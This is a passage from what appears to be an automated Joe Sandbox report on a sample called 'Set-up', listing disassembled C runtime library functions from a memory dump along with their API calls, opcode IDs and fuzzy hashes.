                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Policy$Initialize$Concurrency@@Policy@Scheduler$ElementHeadKey@2@@ListValue@$??2@CountCriticalExceptionH_prolog3SectionSpinThrow$AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastV01@@_memsetmemcpystd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 4135718791-0
                                                                                              • Opcode ID: 89bcfb0f911af8840bec4c02aafff4be9b636c2283016256087cfe5bdbb6719a
                                                                                              • Instruction ID: 5871451b851c053fdaf0695e32e434177f98a30202cd7a3fcde4f6f1673b7fd0
                                                                                              • Opcode Fuzzy Hash: 89bcfb0f911af8840bec4c02aafff4be9b636c2283016256087cfe5bdbb6719a
                                                                                              • Instruction Fuzzy Hash: C151E6B1A00A86EBCB08DF75C881B98FBA4FF09314F54862ED52D97290D739A564CF90
                                                                                              Function 6BB6C737 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 223COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB6C801
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                                                                              • API String ID: 3347428461-3573488595
                                                                                              • Opcode ID: a5f0fc52d73170c674f58b465093f0fb6c1f5978a840f01489bba054e6caa0cb
                                                                                              • Instruction ID: 0ef91d48217b46183300e4b74214a60ccb6a5918272bf0d77460e0882f034f50
                                                                                              • Opcode Fuzzy Hash: a5f0fc52d73170c674f58b465093f0fb6c1f5978a840f01489bba054e6caa0cb
                                                                                              • Instruction Fuzzy Hash: B571F572C842CADEEB245F69C9467AE77B0EB12784F1140B6D86496181F3BD8E81CB51
                                                                                              Function 6BB9B87B Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 115libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B88C
                                                                                                • Part of subcall function 6BB9B6C7: __EH_prolog3.LIBCMT ref: 6BB9B6CE
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B89A
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B8A8
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B8B2
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B8BC
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9B8D1
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9B8E0
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumber), ref: 6BB9B8EF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9B8F6
                                                                                              • GetLastError.KERNEL32 ref: 6BB9B900
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9B919
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version@$Concurrency@@Manager@1@Resource$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency::unsupported_os::unsupported_osErrorExceptionH_prolog3HandleLastModuleProcThrow
                                                                                              • String ID: GetCurrentProcessorNumber$kernel32.dll
                                                                                              • API String ID: 204447691-1711015486
                                                                                              • Opcode ID: e19464e7cc5bb9e69fcc199b5a3d55e916d705e5ca4b5b488a6d41a5241ec4da
                                                                                              • Instruction ID: 52f539fd307a2b732865b7c2cda374268a9572c9fb0e79fb4f1a23f3d654b9c6
                                                                                              • Opcode Fuzzy Hash: e19464e7cc5bb9e69fcc199b5a3d55e916d705e5ca4b5b488a6d41a5241ec4da
                                                                                              • Instruction Fuzzy Hash: 1D41D0314182C28BD720EF25E88172AB7E4FF87315F14897AF4A596141C33CD949CBA2
                                                                                              Function 6BB6A428 Relevance: 22.6, APIs: 15, Instructions: 116COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB6A48E
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76E9C
                                                                                              • ___free_lconv_mon.LIBCMT ref: 6BB76EA7
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76EBD
                                                                                              • ___free_lconv_num.LIBCMT ref: 6BB76EC8
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76ED5
                                                                                              • free.MSVCR100(?,?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76EE0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$___free_lconv_mon___free_lconv_num
                                                                                              • String ID:
                                                                                              • API String ID: 2838340673-0
                                                                                              • Opcode ID: bc2212bb67cfc9f42f03ded92e5abec5d033d8b52a64ccedec0160ca487c8841
                                                                                              • Instruction ID: db824adb0cce9594b1582ce1f885421fe6694e0ed168a58beef606793671cc0f
                                                                                              • Opcode Fuzzy Hash: bc2212bb67cfc9f42f03ded92e5abec5d033d8b52a64ccedec0160ca487c8841
                                                                                              • Instruction Fuzzy Hash: 7F316E725083C1DFDB20AF75DD89A5A77EAEF00394F50087AE16997160FB3DAD808B21
                                                                                              Function 6BB67F86 Relevance: 21.3, APIs: 14, Instructions: 349COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _calloc_crt.MSVCR100(00000001,00000050), ref: 6BB67FAC
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB67FBF
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB67FDD
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
                                                                                                • Part of subcall function 6BB6767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC
                                                                                              • free.MSVCR100(00000000), ref: 6BB9170F
                                                                                              • free.MSVCR100(00000000), ref: 6BB91718
                                                                                              • free.MSVCR100(?,00000000), ref: 6BB91720
                                                                                              • ___free_lconv_mon.LIBCMT ref: 6BB91729
                                                                                              • free.MSVCR100(00000000,00000000), ref: 6BB9172F
                                                                                              • free.MSVCR100(?,00000000,00000000), ref: 6BB91737
                                                                                              • free.MSVCR100(?,?,00000000,00000000), ref: 6BB9173F
                                                                                              • free.MSVCR100(?), ref: 6BB9174F
                                                                                              • free.MSVCR100(?,?), ref: 6BB9175A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$InfoLocale_calloc_crt_malloc_crt$___free_lconv_monmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 1432309319-0
                                                                                              • Opcode ID: 020991a61e210b4e05efe26b82703e520435f5d4ee2bd0ec014dd2f312032c8e
                                                                                              • Instruction ID: d862c8bd7d2f374d2c97b47fadc1b6f4a11e7312a48b3293371a681c6b712547
                                                                                              • Opcode Fuzzy Hash: 020991a61e210b4e05efe26b82703e520435f5d4ee2bd0ec014dd2f312032c8e
                                                                                              • Instruction Fuzzy Hash: 71B163B2940259AEE711CFB5CC81FEB77ADEB49780F140466FA05DB185FAB4DA408B60
                                                                                              Function 6BB60D61 Relevance: 21.2, APIs: 14, Instructions: 152COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno$__cftof
                                                                                              • String ID:
                                                                                              • API String ID: 813615167-0
                                                                                              • Opcode ID: fee85dbb746cc57822a84aa5661fc8014223f5e4df4e44d7eef2da69b4267393
                                                                                              • Instruction ID: 1cc799a3b867697b2fe364f274530ca2b6049623085b5d73cf88b11722c176ef
                                                                                              • Opcode Fuzzy Hash: fee85dbb746cc57822a84aa5661fc8014223f5e4df4e44d7eef2da69b4267393
                                                                                              • Instruction Fuzzy Hash: FE4104321046E59EC7259F38DC829AE37B4DE46764364076AE5709F1D0EB3CDE42CB90
                                                                                              Function 6BB6203F Relevance: 21.1, APIs: 14, Instructions: 108threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __set_flsgetvalue.MSVCR100(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6206A
                                                                                                • Part of subcall function 6BB6067B: TlsGetValue.KERNEL32(?,6BB606AF), ref: 6BB60684
                                                                                              • TlsGetValue.KERNEL32(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6207B
                                                                                              • _calloc_crt.MSVCR100(00000001,00000214), ref: 6BB6208E
                                                                                              • DecodePointer.KERNEL32(00000000), ref: 6BB620AC
                                                                                              • _initptd.MSVCR100(00000000,00000000), ref: 6BB620BE
                                                                                                • Part of subcall function 6BB6215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000D), ref: 6BB621A4
                                                                                                • Part of subcall function 6BB6215F: InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000C), ref: 6BB621C5
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB620C5
                                                                                              • __freeptd.LIBCMT ref: 6BB625B1
                                                                                              • __heap_init.LIBCMT ref: 6BB6B235
                                                                                              • GetCommandLineA.KERNEL32(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B266
                                                                                              • GetCommandLineW.KERNEL32 ref: 6BB6B271
                                                                                              • __ioterm.LIBCMT ref: 6BB780B2
                                                                                              • free.MSVCR100(00000000), ref: 6BB87485
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
                                                                                              • String ID:
                                                                                              • API String ID: 2121586863-0
                                                                                              • Opcode ID: 28f943b628af99a16f581e468e2fd51ab3cb885a4809a5ac1eabb1803253b8ca
                                                                                              • Instruction ID: bd07b703933d4d23dc0e4314a52826572615b7f4992468d625a3bac775ef4273
                                                                                              • Opcode Fuzzy Hash: 28f943b628af99a16f581e468e2fd51ab3cb885a4809a5ac1eabb1803253b8ca
                                                                                              • Instruction Fuzzy Hash: 6331A13190A6C19EEB313FB68D5261E3BB0EF46798B24456AD865C1040FF7EC9808B67
                                                                                              Function 6BB6F4EC Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 98COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::Name::operator=
                                                                                              • String ID: class $coclass $cointerface $enum $struct $union $unknown ecsu'
                                                                                              • API String ID: 1765408024-3025788322
                                                                                              • Opcode ID: 12b504797490e1a7e06e4da1dc07632fe639a882a4c9c486205be9abf8268f98
                                                                                              • Instruction ID: e418d83c3cb50d1ab9c31be700b0acef5730305433c33d60650b0eba4cdabcd8
                                                                                              • Opcode Fuzzy Hash: 12b504797490e1a7e06e4da1dc07632fe639a882a4c9c486205be9abf8268f98
                                                                                              • Instruction Fuzzy Hash: 9D317E35940589AFCF04DFACD851AAEB7B5FB45795F1044ABE825A7240EB38DE00CB60
                                                                                              Function 6BBA012C Relevance: 19.7, APIs: 13, Instructions: 164COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000008,ECA782CA,?,?), ref: 6BBA0169
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(ECA782CA,?,?), ref: 6BBA01A4
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,ECA782CA,?,?), ref: 6BBA01BD
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,ECA782CA,?,?), ref: 6BBA01D8
                                                                                              • _memset.LIBCMT(?,00000000,?,ECA782CA,?,?), ref: 6BBA01EC
                                                                                              • _memset.LIBCMT(?,00000000,?,ECA782CA,?,?), ref: 6BBA01FF
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,ECA782CA,?,?), ref: 6BBA024F
                                                                                              • GetLastError.KERNEL32(?,?,?,ECA782CA,?,?), ref: 6BBA025F
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,ECA782CA,?,?), ref: 6BBA0278
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,ECA782CA,?,?), ref: 6BBA0287
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,ECA782CA,?,?), ref: 6BBA028E
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00004004,?,?,?,ECA782CA,?,?), ref: 6BBA02B0
                                                                                              • _memset.LIBCMT(00000000,00000000,00004004,?,?,?,ECA782CA,?,?), ref: 6BBA02C1
                                                                                                • Part of subcall function 6BBA16DE: _memset.LIBCMT(?,00000000,0000003E,00000000,00000000), ref: 6BBA16FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$??2@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 1488694034-0
                                                                                              • Opcode ID: 669d2f5ba92d37a543ba7d8e317cc681946b6bd4b4555842f44adaa0d82b91e9
                                                                                              • Instruction ID: ab310dabe969bc400a90d5da8155fa73ab2471e50efef7424fddfcb8665134bc
                                                                                              • Opcode Fuzzy Hash: 669d2f5ba92d37a543ba7d8e317cc681946b6bd4b4555842f44adaa0d82b91e9
                                                                                              • Instruction Fuzzy Hash: 1651C5B15057819FD724CF38C882B2ABBE4FF49354F104A3EE15AC7690EB39E8418B54
                                                                                              Function 6BB74F02 Relevance: 19.6, APIs: 13, Instructions: 147stringCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strnlen.LIBCMT(?,?), ref: 6BB74F26
                                                                                              • __crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB74F5A
                                                                                              • __crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB74FD5
                                                                                              • strcpy_s.MSVCR100(?,?,00000000), ref: 6BB74FEC
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB74FF9
                                                                                              • _errno.MSVCR100 ref: 6BB8C372
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C37C
                                                                                              • _errno.MSVCR100 ref: 6BB8C3AD
                                                                                              • _errno.MSVCR100 ref: 6BB8C3B8
                                                                                              • _errno.MSVCR100 ref: 6BB8C3C7
                                                                                              • malloc.MSVCR100(00000008), ref: 6BB8C3D1
                                                                                              • _errno.MSVCR100 ref: 6BB8C3EA
                                                                                              • _errno.MSVCR100 ref: 6BB8C3F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfo_strnlenmallocstrcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2430913482-0
                                                                                              • Opcode ID: bffce4714c6168f6be62a5bd0fc60cd49985d1cb5e947cb22730b20e0d0c7835
                                                                                              • Instruction ID: 4cf46a2aae1c33acad5593df47836d0ef0bed26e9c5a4bb478d6dc6326364f83
                                                                                              • Opcode Fuzzy Hash: bffce4714c6168f6be62a5bd0fc60cd49985d1cb5e947cb22730b20e0d0c7835
                                                                                              • Instruction Fuzzy Hash: F24134716082C5EFEB145F75DC81B9E3BB0EF46754F1001A9E4289F290EB7D8942CBA1
                                                                                              Function 6BB63BF7 Relevance: 19.6, APIs: 13, Instructions: 145COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB63C1B
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5A3
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5AD
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5CA
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5DB
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5E6
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5FC
                                                                                              • malloc.MSVCR100(00000008,?,?,6BB63C95,?,?,?), ref: 6BB8C634
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C650
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,6BB63C95,?,?,?), ref: 6BB8C66B
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C67C
                                                                                              • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C695
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                                                                              • String ID:
                                                                                              • API String ID: 4082481270-0
                                                                                              • Opcode ID: 60193fc2cb40f566f266439dff3dbdc6f25d3998a3153d0dc76023f8e3518b7c
                                                                                              • Instruction ID: e3cc292e29eed0d375ce05ef164b6a3d467e0960b9933e84e3f91ed551d37d6a
                                                                                              • Opcode Fuzzy Hash: 60193fc2cb40f566f266439dff3dbdc6f25d3998a3153d0dc76023f8e3518b7c
                                                                                              • Instruction Fuzzy Hash: 8641B7B1604285AFDB145F79DC82E6E37A4DF46798B10027AF514DB290FB7CCD408B65
                                                                                              Function 6BB6CCC4 Relevance: 19.6, APIs: 13, Instructions: 145COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB6CCE8
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C84E
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C858
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C875
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C886
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C891
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C8A7
                                                                                              • malloc.MSVCR100(00000008,?,?,6BB6CD55,?,?,?), ref: 6BB8C8DF
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C8FB
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,6BB6CD55,?,?,?), ref: 6BB8C916
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C927
                                                                                              • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C940
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                                                                              • String ID:
                                                                                              • API String ID: 4082481270-0
